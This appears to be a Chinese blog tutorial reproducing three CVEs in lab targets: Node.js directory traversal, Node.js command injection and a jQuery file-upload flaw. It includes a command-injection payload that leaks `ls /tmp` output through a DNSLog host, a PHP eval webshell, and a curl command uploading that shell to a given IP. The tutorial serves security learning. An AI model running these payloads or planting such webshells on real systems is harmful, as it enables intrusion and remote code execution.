首页 前端知识 框架安全&CVE复现&Django&Flask&Node.JS&JQuery

框架安全&CVE复现&Django&Flask&Node.JS&JQuery

2024-04-22 09:04:12 前端知识 前端哥 73 834 我要收藏

在这里插入图片描述

javascript开发框架

靶场搭建可用蓝易云服务器

😘😘😘😘😘😘点击查看详情

Node

Node.js 目录穿越漏洞(CVE-2017-14849)

在这里插入图片描述

在这里插入图片描述

我们可以通过F12看到有很多文件加载了

那么目录穿越是什么呢

其实就是攻击者可以利用该漏洞读取运行应用程序的服务器上的任意文件

那么我们尝试加载

main.js文件

在这里插入图片描述

我们可以看到是无法读取到的

说明我们的路径还是不正确

那么如果真的要搞清楚这个路径需要用到工具去对路径进行拆解了

那么这个文件的真实路径是

/static/main.js

我们尝试下

在这里插入图片描述

可以看见是读取的到的

那么就证明了

如果你知道路径你就可以去穿越目录了

参考

(CVE-2017-14849)Node.js 目录穿越漏洞

node.js 命令执行 (CVE-2021-21315)

这个的话怎么搞呢

首先用到一个网站工具

DNSLog Platform
在这里插入图片描述

获取一个url

在这里插入图片描述

这时候套用模板就可以了

/api/getServices?name[]=$(ping `ls /tmp`.qki7ut.dnslog.cn)

替换上面的url

/api/getServices?name[]=$(ping `ls /tmp`.n9wgwv.dnslog.cn)

在这里插入图片描述

直接替换上

然后访问

这个时候我们回到那个工具网站

在这里插入图片描述

点击上面的那个按钮刷新几下就🆗了

jQuery

jQuery 文件上传漏洞(CVE-2018-9207)

主页面

在这里插入图片描述

然后写一个一句话木马

<?php
    @eval($_POST['shell']);
    ?>

然后在当前目录下打开cmd

在这里插入图片描述

curl -F "myfile=@shell.php" "http://123.58.236.76:19514/jquery-upload-file/php/upload.php"

执行这条命令

只需要改目标ip和端口还有就你的一句话木马文件就可以了

在这里插入图片描述

/jquery-upload-file/

在这里插入图片描述

在这里插入图片描述

转载请注明出处或者链接地址:https://www.qianduange.cn//article/5662.html
评论
发布的文章

CSS(8)空间转换 动画

2024-04-29 12:04:29

CSS介绍(4)--背景属性

2024-04-29 12:04:26

Web学习记录---CSS(1)

2024-04-29 12:04:17

大家推荐的文章
会员中心 联系我 留言建议 回顶部
复制成功!